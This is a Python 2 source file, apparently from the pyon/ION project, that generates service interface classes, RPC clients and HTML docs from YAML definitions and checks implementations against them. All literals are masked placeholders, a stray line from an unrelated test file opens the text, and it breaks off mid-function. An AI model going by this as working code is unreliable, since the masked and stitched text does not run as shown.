) [ <NUM_LIT:0> : <NUM_LIT:2> ] + Interrupt_events ( ) [ <NUM_LIT:4> : <NUM_LIT:6> ] ) ) <EOL> self . assertEqual ( <NUM_LIT:1> , <NUM_LIT:1> ) </s>
"""<STR_LIT>"""

__author__ = '<STR_LIT>'

import datetime
import fnmatch
import inspect
import pkgutil
import os
import re
import sys
import string
import yaml
import hashlib
import traceback
from collections import OrderedDict
from pyon.core.path import list_files_recursive
from pyon.core.interfaces.interface_util import get_object_definition_from_datastore, get_service_definition_from_datastore
from pyon.ion.service import BaseService
from pyon.core.bootstrap import CFG, set_config
# Patching yaml at import time so all subsequent yaml.load* calls preserve
# mapping order (OrderedDict) — a deliberate module-level side effect.
from pyon.util import yaml_ordered_dict; yaml_ordered_dict.apply_yaml_patch()
from pyon.ion.directory_standalone import DirectoryStandalone

# Raw string templates for the generated service interface files.
# (All template bodies are masked literals in this corpus.)
templates = {
    '<STR_LIT:file>':
        '''<STR_LIT>'''
    , '<STR_LIT>':
        '''<STR_LIT>'''
    , '<STR_LIT>':
        '''<STR_LIT>'''
    , '<STR_LIT:class>':
        # Two adjacent literals: implicit string concatenation.
        '''<STR_LIT>'''
        '''<STR_LIT>'''
    , '<STR_LIT>':
        '''<STR_LIT>'''
    , '<STR_LIT>':
        '''<STR_LIT>'''
    , '<STR_LIT>':
        '''<STR_LIT>'''
    , '<STR_LIT>':
        '<STR_LIT>'
    , '<STR_LIT>':
        '<STR_LIT>'
    , '<STR_LIT>':
        '<STR_LIT>'
    , '<STR_LIT>':
        '''<STR_LIT>'''
    , '<STR_LIT>': '<STR_LIT>'
    , '<STR_LIT>':
        '<STR_LIT>'
    , '<STR_LIT>':
        '''<STR_LIT>'''
    , '<STR_LIT>':
        '''<STR_LIT>'''
    , '<STR_LIT>':
        '''<STR_LIT>'''
    , '<STR_LIT>':
        '''<STR_LIT>'''
}

# Templates for the generated client classes (RPC / process-RPC / conversation-RPC).
client_templates = {
    '<STR_LIT>':
        '''<STR_LIT>''',
    '<STR_LIT:class>':
        '''<STR_LIT>''',
    '<STR_LIT>':
        '''<STR_LIT>''',
    '<STR_LIT>': "<STR_LIT>",
    '<STR_LIT>': "<STR_LIT>",
    '<STR_LIT>':
        '''<STR_LIT>''',
    '<STR_LIT>':
        '''<STR_LIT>''',
    '<STR_LIT>':
        '''<STR_LIT>'''
}

# Templates for the generated per-service HTML documentation pages.
html_doc_templates = {
    '<STR_LIT>':
        '''<STR_LIT>'''
    ,
    '<STR_LIT>':
        '''<STR_LIT>''',
    '<STR_LIT>': '<STR_LIT>',
    '<STR_LIT>': '<STR_LIT>',
}

# Compile every raw template into a string.Template (Python 2: iteritems).
templates = dict(((k, string.Template(v)) for k, v in templates.iteritems()))
client_templates = dict(((k, string.Template(v)) for k, v in client_templates.iteritems()))
html_doc_templates = dict(((k, string.Template(v)) for k, v in html_doc_templates.iteritems()))


class IonServiceDefinitionError(Exception):
    # Raised when a service YAML definition is structurally invalid.
    pass


class IonYamlLoader(yaml.Loader):
    """<STR_LIT>"""
    pass


class ServiceObjectGenerator:
    '''<STR_LIT>'''
    # Shared across instances: YAML object references and enum registry.
    object_references = {}
    enums_by_name = {}
    # Timestamp embedded into every generated file.
    currtime = str(datetime.datetime.today())

    def __init__(self, system_name=None, read_from_yaml_file=False):
        # system_name: datastore scope when reading definitions from the
        # datastore instead of the filesystem (read_from_yaml_file=False).
        self.system_name = system_name
        self.read_from_yaml_file = read_from_yaml_file
        self.service_definitions_filename = OrderedDict()

    def generate(self, opts):
        '''<STR_LIT>'''
        service_dir, interface_dir = '<STR_LIT>', '<STR_LIT>'
        data_yaml_text = self.get_object_definition()
        service_yaml_text = self.get_service_definition()
        enum_tag = u'<STR_LIT>'
        self.opts = opts
        set_config()
        rpv_convos_enabled = CFG.get_safe('<STR_LIT>', False)
        print '<STR_LIT>' % rpv_convos_enabled

        def enum_constructor(loader, node):
            # Turn an enum YAML node into a "!Name" tag string based on the
            # node's textual content.
            val_str = str(node.value)
            val_str = val_str[<NUM_LIT:1>:-<NUM_LIT:1>].strip()
            if '<STR_LIT:name>' in val_str:
                name_str = val_str.split('<STR_LIT:U+002C>', <NUM_LIT:1>)[<NUM_LIT:0>].split('<STR_LIT:=>')[<NUM_LIT:1>].strip()
                return "<STR_LIT:!>" + str(name_str)
            else:
                return "<STR_LIT>"
        yaml.add_constructor(enum_tag, enum_constructor, Loader=IonYamlLoader)

        # Pass 1: register a constructor (and an "extends" constructor) for
        # every object definition found in the data YAML.
        defs = yaml.load_all(data_yaml_text, Loader=IonYamlLoader)
        def_dict = {}
        for def_set in defs:
            for name, _def in def_set.iteritems():
                if isinstance(_def, OrderedDict):
                    def_dict[name] = _def
                tag = u'<STR_LIT>' % (name)

                def constructor(loader, node):
                    # Resolves a !Type tag either to an enum default record or
                    # to a placeholder string.
                    value = node.tag.strip('<STR_LIT:!>')
                    if value in self.enums_by_name:
                        return {"<STR_LIT>": True, "<STR_LIT:value>": value + "<STR_LIT:.>" + self.enums_by_name[value]["<STR_LIT:default>"], "<STR_LIT:type>": value}
                    else:
                        return str(value) + "<STR_LIT>"
                yaml.add_constructor(tag, constructor, Loader=IonYamlLoader)
                xtag = u'<STR_LIT>' % (name)

                def extends_constructor(loader, node):
                    if isinstance(node, yaml.MappingNode):
                        value = loader.construct_mapping(node)
                    else:
                        value = {}
                    return value
                yaml.add_constructor(xtag, extends_constructor, Loader=IonYamlLoader)

        # Pass 2: same registration for objects declared inside the service YAML.
        defs = yaml.load_all(service_yaml_text, Loader=IonYamlLoader)
        for def_set in defs:
            for name, _def in def_set.get('<STR_LIT>', {}).iteritems():
                if isinstance(_def, OrderedDict):
                    def_dict[name] = _def
                tag = u'<STR_LIT>' % (name)

                def constructor(loader, node):
                    value = node.tag.strip('<STR_LIT:!>')
                    if value in self.enums_by_name:
                        return {"<STR_LIT>": True, "<STR_LIT:value>": value + "<STR_LIT:.>" + self.enums_by_name[value]["<STR_LIT:default>"], "<STR_LIT:type>": value}
                    else:
                        return str(value) + "<STR_LIT>"
                yaml.add_constructor(tag, constructor, Loader=IonYamlLoader)
                xtag = u'<STR_LIT>' % (name)

                def extends_constructor(loader, node):
                    if isinstance(node, yaml.MappingNode):
                        value = loader.construct_mapping(node)
                    else:
                        value = {}
                    return value
                yaml.add_constructor(xtag, extends_constructor, Loader=IonYamlLoader)

        # Pass 3: re-scan the data YAML to hook the documentation-collecting
        # constructor on the *default* yaml Loader this time.
        yaml_text = data_yaml_text
        defs = yaml.load_all(yaml_text, Loader=IonYamlLoader)
        for def_set in defs:
            for name, _def in def_set.iteritems():
                tag = u'<STR_LIT>' % (name)
                yaml.add_constructor(tag, self.doc_tag_constructor)
                xtag = u'<STR_LIT>' % (name)
                yaml.add_constructor(xtag, lambda loader, node: {})

        # Signature cache: md5 of each service YAML from the previous run,
        # used to skip regenerating unchanged interfaces.
        svc_signatures = {}
        sigfile = os.path.join('<STR_LIT>', '<STR_LIT>')
        if os.path.exists(sigfile):
            with open(sigfile, '<STR_LIT:r>') as f:
                cnts = f.read()
                svc_signatures = yaml.load(cnts)

        count = <NUM_LIT:0>
        raw_services = {}
        service_dep_graph = {}
        client_defs = {}
        yaml_file_re = re.compile('<STR_LIT>')
        for yaml_file in self.get_service_definition_file_path(service_dir):
            file_path = yaml_file_re.match(yaml_file).group(<NUM_LIT:2>)
            interface_base, interface_name = os.path.dirname(file_path), os.path.basename(file_path)
            interface_file = os.path.join('<STR_LIT>', interface_base, '<STR_LIT>' % interface_name)
            parent_dir = os.path.dirname(interface_file)
            if not os.path.exists(parent_dir):
                os.makedirs(parent_dir)
            # Walk up from the interface dir creating __init__.py package
            # markers until the root package directory is reached.
            parent = parent_dir
            while True:
                curdir = os.path.split(os.path.abspath(parent))[<NUM_LIT:1>]
                if curdir == '<STR_LIT>':
                    break
                else:
                    parent = os.path.split(os.path.abspath(parent))[<NUM_LIT:0>]
                    pkg_file = os.path.join(parent, '<STR_LIT>')
                    if not self.opts.dryrun and not os.path.exists(pkg_file):
                        open(pkg_file, '<STR_LIT:w>').close()
            pkg_file = os.path.join(parent_dir, '<STR_LIT>')
            if not self.opts.dryrun and not os.path.exists(pkg_file):
                open(pkg_file, '<STR_LIT:w>').close()
            skip_file = False
            yaml_text = self.get_yaml_text(yaml_file)
            if (yaml_text):
                m = hashlib.md5()
                m.update(yaml_text)
                cur_md5 = m.hexdigest()
                # Unchanged since last run (and not forced): skip regeneration.
                if yaml_file in svc_signatures and not opts.force:
                    if cur_md5 == svc_signatures[yaml_file]:
                        print "<STR_LIT>" % interface_name
                        skip_file = True
                if opts.dryrun:
                    count += <NUM_LIT:1>
                    print "<STR_LIT>" % interface_name
                    skip_file = True
                if not skip_file:
                    svc_signatures[yaml_file] = cur_md5
                defs = yaml.load_all(yaml_text)
                for def_set in defs:
                    # Document sets that declare objects only register doc tags.
                    if '<STR_LIT>' in def_set:
                        for obj_name in def_set['<STR_LIT>']:
                            tag = u'<STR_LIT>' % (obj_name)
                            yaml.add_constructor(tag, self.doc_tag_constructor)
                        continue
                    service_name = def_set.get('<STR_LIT:name>', None)
                    class_docstring = def_set.get('<STR_LIT>', "<STR_LIT>")
                    spec = def_set.get('<STR_LIT>', None)
                    dependencies = def_set.get('<STR_LIT>', None)
                    meth_list = def_set.get('<STR_LIT>', {}) or {}
                    client_path = ('<STR_LIT:.>'.join(['<STR_LIT>', interface_base.replace('<STR_LIT:/>', '<STR_LIT:.>'), '<STR_LIT>' % interface_name]), '<STR_LIT>' % self.service_name_from_file_name(interface_name))
                    # Reflow the class docstring, dropping a single trailing
                    # empty line.
                    class_docstring_lines = class_docstring.split('<STR_LIT:\n>')
                    first_time = True
                    class_docstring_formatted = "<STR_LIT>"
                    for i in range(len(class_docstring_lines)):
                        class_docstring_line = class_docstring_lines[i]
                        if class_docstring_line == "<STR_LIT>" and i == len(class_docstring_lines) - <NUM_LIT:1>:
                            break
                        if first_time:
                            first_time = False
                        else:
                            class_docstring_formatted += "<STR_LIT>"
                        class_docstring_formatted += class_docstring_line
                    if not skip_file:
                        if service_name in raw_services:
                            raise StandardError("<STR_LIT>" % service_name)
                        raw_services[service_name] = {'<STR_LIT:name>': service_name,
                                                      '<STR_LIT>': class_docstring_formatted,
                                                      '<STR_LIT>': spec,
                                                      '<STR_LIT>': dependencies,
                                                      '<STR_LIT>': meth_list,
                                                      '<STR_LIT>': interface_file,
                                                      '<STR_LIT>': interface_name,
                                                      '<STR_LIT>': client_path}
                        if not service_name in service_dep_graph:
                            service_dep_graph[service_name] = set()
                        for dep in dependencies:
                            service_dep_graph[service_name].add(dep)
                    # NOTE(review): client path recorded even for skipped files
                    # so dependents can still resolve it — confirm nesting.
                    client_defs[service_name] = client_path
        print "<STR_LIT>", len(raw_services), "<STR_LIT>"
        # Topologically order services by their dependency graph (Kahn-style:
        # start from services with no deps, peel layers).
        sorted_services = []
        service_set = set([k for k, v in service_dep_graph.iteritems() if len(v) == <NUM_LIT:0>])
        while len(service_set) > <NUM_LIT:0>:
            n = service_set.pop()
            if n in raw_services:
                sorted_services.append((n, raw_services[n]))
            depending_services = [k for k, v in service_dep_graph.iteritems() if n in v]
            for depending_service in depending_services:
                service_dep_graph[depending_service].remove(n)
                if len(service_dep_graph[depending_service]) == <NUM_LIT:0>:
                    service_set.add(depending_service)
        # Any service still holding deps is part of a cycle / missing dep.
        remaining_deps = set([k for k, v in service_dep_graph.iteritems() if len(v) > <NUM_LIT:0>])
        if len(remaining_deps):
            print >> sys.stderr, "<STR_LIT>"
            print >> sys.stderr, "<STR_LIT>"
            print >> sys.stderr, "<STR_LIT>"
            for k, v in service_dep_graph.iteritems():
                if len(v) == <NUM_LIT:0>:
                    continue
                print >> sys.stderr, "<STR_LIT:\t>", k, "<STR_LIT>", "<STR_LIT:U+002C>".join(v)
            print >> sys.stderr, "<STR_LIT>"
            raise StandardError("<STR_LIT>" % str(remaining_deps))
        # Generate interfaces in dependency order so client imports resolve.
        for svc in sorted_services:
            svc_name, raw_def = svc
            self.generate_service(raw_def['<STR_LIT>'], raw_def, client_defs, opts, rpv_convos_enabled)
            count += <NUM_LIT:1>
        if count > <NUM_LIT:0> and not opts.dryrun:
            print "<STR_LIT>", sigfile
            with open(sigfile, '<STR_LIT:w>') as f:
                f.write(yaml.dump(svc_signatures))
            # Smoke-load the generated modules to catch syntax/import errors.
            # NOTE(review): exact nesting of these three calls inferred from
            # token order — confirm against upstream source.
            self.load_mods("<STR_LIT>", True)
            base_subtypes = self.find_subtypes(BaseService)
            self.load_mods("<STR_LIT>", False)
            # Stray string literal in the original source (dead expression,
            # effectively a comment); preserved as-is.
            '''<STR_LIT>'''
        self.generate_validation_report()
        exitcode = <NUM_LIT:0>
        # Dry run with pending changes signals "would regenerate" via exit code.
        if count > <NUM_LIT:0> and opts.dryrun:
            exitcode = <NUM_LIT:1>
        return exitcode

    def build_class_doc_string(self, base_doc_str, _def_spec):
        '''<STR_LIT>'''
        doc_str = base_doc_str
        if _def_spec:
            first_time = True
            # Append one reference line per whitespace-separated spec URL.
            for url in _def_spec.split('<STR_LIT:U+0020>'):
                if first_time:
                    doc_str += '<STR_LIT:\n>'
                    first_time = False
                doc_str += "<STR_LIT>" + url
        return doc_str

    def _get_default(self, v):
        # Render a YAML default value as Python source text for the generated
        # signature; enum-tagged strings resolve to their enum default.
        if type(v) is str:
            if v.startswith("<STR_LIT:!>"):
                val = v.strip("<STR_LIT:!>")
                if val in self.enums_by_name:
                    enum_def = self.enums_by_name[val]
                    val = "<STR_LIT>" + val + "<STR_LIT:.>" + enum_def["<STR_LIT:default>"]
                else:
                    val = "<STR_LIT:None>"
            else:
                val = "<STR_LIT>" % (v)
            return val
        elif type(v) in (int, long, float):
            return str(v)
        elif type(v) is bool:
            return "<STR_LIT:True>" if v else "<STR_LIT:False>"
        else:
            # Containers and unknown types default to None in the signature.
            return "<STR_LIT:None>"

    def find_object_reference(self, arg):
        # Reverse lookup: which registered object definition mentions `arg`.
        for obj, node in self.object_references.iteritems():
            if node.find(arg) > -<NUM_LIT:1>:
                return obj
        return "<STR_LIT>"

    def build_exception_doc_html(self, _def):
        # Render the `throws` section of a method as HTML rows.
        args = []
        for key, val in (_def or {}).iteritems():
            args.append(html_doc_templates['<STR_LIT>'].substitute(type=key, description=val))
        args_str = '<STR_LIT>'.join(args)
        return args_str

    def build_args_doc_html(self, _def):
        # Render an in/out argument mapping as HTML rows, mapping YAML sample
        # values to display type names.
        args = []
        for key, val in (_def or {}).iteritems():
            if isinstance(val, datetime.datetime):
                val = "<STR_LIT>"
            elif isinstance(val, dict):
                val = self.find_object_reference(key)
            elif isinstance(val, list):
                val = "<STR_LIT:list>"
            else:
                val = str(type(val)).replace("<STR_LIT>", "<STR_LIT>").replace("<STR_LIT>", "<STR_LIT>")
            args.append(html_doc_templates['<STR_LIT>'].substitute(name=key, val=val))
        args_str = '<STR_LIT>'.join(args)
        return args_str

    def build_args_doc_string(self, base_doc_str, _def_spec, _def_in, _def_out, _def_throws):
        # Assemble the full method docstring: spec links, @param lines for
        # inputs, @retval lines for outputs, @throws lines for exceptions.
        doc_str = base_doc_str
        if _def_spec:
            first_time = True
            for url in _def_spec.split('<STR_LIT:U+0020>'):
                if first_time:
                    doc_str += '<STR_LIT:\n>'
                    first_time = False
                doc_str += templates['<STR_LIT>'].substitute(link=url)
        first_time = True
        for key, val in (_def_in or {}).iteritems():
            if isinstance(val, basestring):
                if val.startswith("<STR_LIT:!>"):
                    val = val.strip("<STR_LIT:!>")
                else:
                    val = '<STR_LIT:str>'
            elif isinstance(val, datetime.datetime):
                val = "<STR_LIT>"
            elif isinstance(val, dict):
                val = self.find_object_reference(key)
            elif isinstance(val, list):
                val = "<STR_LIT:list>"
            else:
                val = str(type(val)).replace("<STR_LIT>", "<STR_LIT>").replace("<STR_LIT>", "<STR_LIT>")
            if first_time:
                doc_str += '<STR_LIT:\n>'
                first_time = False
            doc_str += templates['<STR_LIT>'].substitute(in_name=key, in_type=val)
        # NOTE: first_time deliberately carries over from the input loop.
        for key, val in (_def_out or {}).iteritems():
            if isinstance(val, basestring):
                if val.startswith("<STR_LIT:!>"):
                    val = val.strip("<STR_LIT:!>")
                else:
                    val = '<STR_LIT:str>'
            elif isinstance(val, datetime.datetime):
                val = "<STR_LIT>"
            elif isinstance(val, dict):
                val = self.find_object_reference(key)
            elif isinstance(val, list):
                val = "<STR_LIT:list>"
            else:
                val = str(type(val)).replace("<STR_LIT>", "<STR_LIT>").replace("<STR_LIT>", "<STR_LIT>")
            if first_time:
                doc_str += '<STR_LIT:\n>'
                first_time = False
            doc_str += templates['<STR_LIT>'].substitute(out_name=key, out_type=val)
        if _def_throws:
            for key, val in (_def_throws or {}).iteritems():
                if first_time:
                    doc_str += '<STR_LIT:\n>'
                    first_time = False
                doc_str += templates['<STR_LIT>'].substitute(except_name=key, except_info=val)
        return doc_str

    def doc_tag_constructor(self, loader, node):
        '''<STR_LIT>'''
        for key_node, value_node in node.value:
            print key_node, "<STR_LIT>", value_node
        # Record where each tagged object was defined for later reverse lookup.
        self.object_references[str(node.tag[<NUM_LIT:1>:])] = str(node.start_mark)
        return str(node.tag)

    def service_name_from_file_name(self, file_name):
        '''<STR_LIT>'''
        # e.g. "some_service.yml" -> "SomeService" (title-cased, separators dropped).
        file_name = os.path.basename(file_name).split('<STR_LIT:.>', <NUM_LIT:1>)[<NUM_LIT:0>]
        return file_name.title().replace('<STR_LIT:_>', '<STR_LIT>').replace('<STR_LIT:->', '<STR_LIT>')

    def find_subtypes(self, clz):
        '''<STR_LIT>'''
        res = []
        for cls in clz.__subclasses__():
            assert hasattr(cls, '<STR_LIT:name>'), '<STR_LIT>' % cls
            res.append(cls)
        return res

    def generate_service(self, interface_file, svc_def, client_defs, opts, rpv_convos_enabled):
        """<STR_LIT>"""
        service_name = svc_def['<STR_LIT:name>']
        class_docstring = svc_def['<STR_LIT>']
        class_spec = svc_def['<STR_LIT>']
        dependencies = svc_def['<STR_LIT>']
        meth_list = svc_def['<STR_LIT>']
        interface_name = svc_def['<STR_LIT>']
        class_name = self.service_name_from_file_name(interface_name)
        if service_name is None:
            raise IonServiceDefinitionError("<STR_LIT>" % interface_file)
        print '<STR_LIT>' % (interface_name, interface_file)
        methods = []
        class_methods = []
        client_methods = []
        doc_methods = []
        for op_name, op_def in meth_list.iteritems():
            if not op_def:
                continue
            def_docstring, def_spec, def_in, def_out, def_throws = op_def.get('<STR_LIT>', "<STR_LIT>"), op_def.get('<STR_LIT>', None), op_def.get('<STR_LIT>', None), op_def.get('<STR_LIT>', None), op_def.get('<STR_LIT>', None)
            # Reflow the operation docstring (same scheme as the class docstring).
            docstring_lines = def_docstring.split('<STR_LIT:\n>')
            first_time = True
            docstring_formatted = "<STR_LIT>"
            for i in range(len(docstring_lines)):
                docstring_line = docstring_lines[i]
                if docstring_line == "<STR_LIT>" and i == len(docstring_lines) - <NUM_LIT:1>:
                    break
                if first_time:
                    first_time = False
                else:
                    docstring_formatted += "<STR_LIT>"
                docstring_formatted += docstring_line
            if def_in is not None and '<STR_LIT>' in def_in:
                raise StandardError("<STR_LIT>" % (op_name, service_name))
            args_str, class_args_str = self.build_args_str(def_in, False), self.build_args_str(def_in, True)
            docstring_str = templates['<STR_LIT>'].substitute(methoddocstr=self.build_args_doc_string(docstring_formatted, def_spec, def_in, def_out, def_throws))
            outargs_str = '<STR_LIT>'.join(yaml.dump(def_out).split('<STR_LIT:\n>'))
            methods.append(templates['<STR_LIT>'].substitute(name=op_name, args=args_str, methoddocstring=docstring_str, outargs=outargs_str))
            class_methods.append(templates['<STR_LIT>'].substitute(name=op_name, args=class_args_str, methoddocstring=docstring_str, outargs=outargs_str))
            # Build the client-side request-object argument list; args whose
            # default renders as None get the explicit-default template.
            clientobjargs = '<STR_LIT>'
            if def_in:
                all_client_obj_args = []
                for k, v in def_in.iteritems():
                    d = self._get_default(v)
                    if d == "<STR_LIT:None>":
                        all_client_obj_args.append(client_templates['<STR_LIT>'].substitute(name=k, default=d))
                    else:
                        all_client_obj_args.append(client_templates['<STR_LIT>'].substitute(name=k))
                clientobjargs = "<STR_LIT:U+002C>".join(all_client_obj_args)
            req_in_obj_name = "<STR_LIT>" % (service_name, op_name)
            client_methods.append(client_templates['<STR_LIT>'].substitute(name=op_name,
                                                                           args=class_args_str,
                                                                           methoddocstring=docstring_str,
                                                                           req_in_obj_name=req_in_obj_name,
                                                                           req_in_obj_args=clientobjargs,
                                                                           outargs=outargs_str))
            if opts.servicedoc:
                doc_inargs_str = self.build_args_doc_html(def_in)
                doc_outargs_str = self.build_args_doc_html(def_out)
                doc_exceptions_str = self.build_exception_doc_html(def_throws)
                methoddocstring = docstring_formatted.replace("<STR_LIT>", "<STR_LIT>")
                doc_methods.append(html_doc_templates['<STR_LIT>'].substitute(name=op_name, inargs=doc_inargs_str, methoddocstring=methoddocstring, outargs=doc_outargs_str, exceptions=doc_exceptions_str))
        # Extra client wiring for a special well-known dependency.
        if "<STR_LIT>" in dependencies:
            dep_clients_extra = templates['<STR_LIT>'].substitute()
        else:
            dep_clients_extra = "<STR_LIT>"
        dep_clients = [(x, client_defs[x][<NUM_LIT:1>]) for x in dependencies]
        dep_clients_str = "<STR_LIT:\n>".join(map(lambda x2: templates['<STR_LIT>'].substitute(svc="<STR_LIT>" % x2[<NUM_LIT:0>] if x2[<NUM_LIT:0>] == "<STR_LIT>" else x2[<NUM_LIT:0>], clientclass=x2[<NUM_LIT:1>]), dep_clients))
        dep_client_imports_str = "<STR_LIT:\n>".join([templates['<STR_LIT>'].substitute(clientmodule=client_defs[x][<NUM_LIT:0>], clientclass=client_defs[x][<NUM_LIT:1>]) for x in dependencies])
        service_name_str = templates['<STR_LIT>'].substitute(name=service_name)
        class_docstring_str = templates['<STR_LIT>'].substitute(classdocstr=self.build_class_doc_string(class_docstring, class_spec))
        dependencies_str = templates['<STR_LIT>'].substitute(namelist=dependencies)
        methods_str = '<STR_LIT>'.join(methods) or '<STR_LIT>'
        classmethods_str = '<STR_LIT>'.join(class_methods)
        _class = templates['<STR_LIT:class>'].substitute(name=class_name,
                                                         classdocstring=class_docstring_str,
                                                         servicename=service_name_str,
                                                         dependencies=dependencies_str,
                                                         methods=methods_str,
                                                         classmethods=classmethods_str)
        clients_holder_str = templates['<STR_LIT>'].substitute(name=class_name,
                                                               dep_clients=dep_clients_str,
                                                               dep_clients_extra=dep_clients_extra)
        _client_methods = '<STR_LIT>'.join(client_methods)
        _client_class = client_templates['<STR_LIT:class>'].substitute(name=class_name,
                                                                      clientdocstring='<STR_LIT>',
                                                                      methods=_client_methods)
        _client_rpcclient = client_templates['<STR_LIT>'].substitute(name=class_name,
                                                                     targetname=service_name)
        # Conversation-RPC and process-RPC clients are mutually exclusive,
        # chosen by the rpv_convos_enabled config flag.
        if rpv_convos_enabled:
            _client_convorpc_client = client_templates['<STR_LIT>'].substitute(name=class_name,
                                                                               targetname=service_name)
            _client = client_templates['<STR_LIT>'].substitute(client=_client_class,
                                                               rpcclient=_client_rpcclient,
                                                               processrpcclient='<STR_LIT>',
                                                               conversationrpcclient=_client_convorpc_client)
        else:
            _client_processrpc_client = client_templates['<STR_LIT>'].substitute(name=class_name,
                                                                                 targetname=service_name)
            _client = client_templates['<STR_LIT>'].substitute(client=_client_class,
                                                               rpcclient=_client_rpcclient,
                                                               processrpcclient=_client_processrpc_client,
                                                               conversationrpcclient='<STR_LIT>')
        interface_contents = templates['<STR_LIT:file>'].substitute(dep_client_imports=dep_client_imports_str,
                                                                    clientsholder=clients_holder_str,
                                                                    classes=_class,
                                                                    when_generated=self.currtime,
                                                                    client=_client)
        if not self.opts.dryrun:
            with open(interface_file, '<STR_LIT:w>') as f:
                f.write(interface_contents)
        doc_methods_str = '<STR_LIT>'.join(doc_methods)
        doc_page_contents = html_doc_templates['<STR_LIT>'].substitute(name=class_name, methods=doc_methods_str)
        if not self.opts.dryrun and opts.servicedoc:
            # Mirror the interface path into the documentation output tree.
            doc_file = interface_file.replace("<STR_LIT>", "<STR_LIT>")
            doc_file = doc_file.replace("<STR_LIT>", "<STR_LIT>")
            parent_dir = os.path.dirname(doc_file)
            if not os.path.exists(parent_dir):
                os.makedirs(parent_dir)
            with open(doc_file, '<STR_LIT:w>') as f1:
                f1.write(doc_page_contents)

    def get_service_definition_file_path(self, service_dir=None):
        # Collect service YAML paths either by walking the filesystem or from
        # the preloaded filename map (datastore mode); filters out files whose
        # name contains the excluded marker or that fail the path regex.
        yaml_file_re = re.compile('<STR_LIT>')
        service_definitions_filename = OrderedDict()
        if self.read_from_yaml_file:
            for root, dirs, files in os.walk(service_dir):
                for filename in fnmatch.filter(files, '<STR_LIT>'):
                    yaml_file = os.path.join(root, filename)
                    file_match = yaml_file_re.match(yaml_file)
                    if '<STR_LIT>' in filename:
                        continue
                    if file_match is None:
                        continue
                    service_definitions_filename[yaml_file] = yaml_file
            return service_definitions_filename
        else:
            for key in self.service_definitions_filename.keys():
                filename = self.service_definitions_filename[key]
                file_match = yaml_file_re.match(filename)
                if '<STR_LIT>' in filename:
                    continue
                if file_match is None:
                    continue
                service_definitions_filename[filename] = filename
            return service_definitions_filename

    def get_yaml_text(self, path):
        '''<STR_LIT>'''
        if self.read_from_yaml_file:
            with open(path, '<STR_LIT:r>') as f:
                return f.read()
        else:
            # Datastore mode: look the document up via the standalone directory;
            # returns the first match's content, or empty when nothing found.
            self.dir = DirectoryStandalone(sysname=self.system_name)
            data = self.dir.lookup_by_path(path)
            for item in data:
                return (item.value['<STR_LIT>']['<STR_LIT>'])
            return '<STR_LIT>'

    def get_object_definition(self):
        # All object YAML concatenated, from disk or from the datastore.
        if self.read_from_yaml_file:
            data_yaml_files = list_files_recursive('<STR_LIT>', '<STR_LIT>', ['<STR_LIT>', '<STR_LIT>', '<STR_LIT>'])
            data = '<STR_LIT>'.join((file.read() for file in (open(path, '<STR_LIT:r>') for path in data_yaml_files if os.path.exists(path))))
        else:
            data = get_object_definition_from_datastore(self.system_name)
        return data

    def get_service_definition(self):
        # All service YAML concatenated, from disk or from the datastore.
        if self.read_from_yaml_file:
            print "<STR_LIT>"
            service_yaml_files = list_files_recursive('<STR_LIT>', '<STR_LIT>')
            data = '<STR_LIT>'.join((file.read() for file in (open(path, '<STR_LIT:r>') for path in service_yaml_files if os.path.exists(path))))
        else:
            print "<STR_LIT>"
            data = get_service_definition_from_datastore(self.system_name)
        return data

    def build_args_str(self, _def, include_self=True):
        '''<STR_LIT>'''
        # Render "name=default" argument text for a generated method signature.
        args = []
        if include_self:
            args.append('<STR_LIT>')
        for key, val in (_def or {}).iteritems():
            if isinstance(val, basestring):
                if val.startswith("<STR_LIT:!>"):
                    val = val.strip("<STR_LIT:!>")
                    if val in self.enums_by_name:
                        enum_def = self.enums_by_name[val]
                        val = "<STR_LIT>" + val + "<STR_LIT:.>" + enum_def["<STR_LIT:default>"]
                    else:
                        val = "<STR_LIT:None>"
                else:
                    val = "<STR_LIT>" % (val)
            elif isinstance(val, datetime.datetime):
                val = "<STR_LIT>" % (val)
            elif isinstance(val, list):
                val = "<STR_LIT:None>"
            elif isinstance(val, dict):
                val = "<STR_LIT:None>"
            elif isinstance(val, tuple):
                val = "<STR_LIT:None>"
            args.append(templates['<STR_LIT>'].substitute(name=key, val=val))
        args_str = '<STR_LIT:U+002CU+0020>'.join(args)
        return args_str

    def generate_validation_report(self):
        # Compare every BaseService subclass against its implementations:
        # flag missing methods and signature mismatches, and write a report.
        from pyon.core import bootstrap
        bootstrap.bootstrap_pyon()
        validation_results = "<STR_LIT>" + self.currtime + "<STR_LIT:\n>"
        self.load_mods("<STR_LIT>", True)
        base_subtypes = self.find_subtypes(BaseService)
        self.load_mods("<STR_LIT>", False)
        self.load_mods("<STR_LIT>", False)
        for base_subtype in base_subtypes:
            base_subtype_name = base_subtype.__module__ + "<STR_LIT:.>" + base_subtype.__name__
            compare_methods = {}
            for method_tuple in inspect.getmembers(base_subtype, inspect.ismethod):
                method_name = method_tuple[<NUM_LIT:0>]
                method = method_tuple[<NUM_LIT:1>]
                # Only compare public methods defined directly on the base class.
                if method_name.startswith("<STR_LIT:_>"):
                    continue
                if method_name not in base_subtype.__dict__:
                    continue
                compare_methods[method_name] = method
            impl_subtypes = self.find_subtypes(base_subtype)
            if len(impl_subtypes) == <NUM_LIT:0>:
                validation_results += "<STR_LIT>" % base_subtype_name
                validation_results += "<STR_LIT>"
            for impl_subtype in self.find_subtypes(base_subtype):
                impl_subtype_name = impl_subtype.__module__ + "<STR_LIT:.>" + impl_subtype.__name__
                added_class_names = False
                found_error = False
                for key in compare_methods:
                    if key not in impl_subtype.__dict__:
                        # Implementation is missing a declared operation.
                        found_error = True
                        if not added_class_names:
                            added_class_names = True
                            validation_results += "<STR_LIT>" % base_subtype_name
                            validation_results += "<STR_LIT>" % impl_subtype_name
                        validation_results += "<STR_LIT>" % key
                    else:
                        base_params = inspect.getargspec(compare_methods[key])
                        impl_params = inspect.getargspec(impl_subtype.__dict__[key])
                        if base_params != impl_params:
                            # Implementation signature differs from interface.
                            found_error = True
                            if not added_class_names:
                                added_class_names = True
                                validation_results += "<STR_LIT>" % base_subtype_name
                                validation_results += "<STR_LIT>" % impl_subtype_name
                            validation_results += "<STR_LIT>" % key
                            validation_results += "<STR_LIT>" % str(base_params)
                            validation_results += "<STR_LIT>" % str(impl_params)
                if found_error is False:
                    validation_results += "<STR_LIT>" % base_subtype_name
                    validation_results += "<STR_LIT>" % impl_subtype_name
                    validation_results += "<STR_LIT>"
        reportfile = os.path.join('<STR_LIT>', '<STR_LIT>')
        try:
            # Best-effort removal of the stale report; bare except preserved
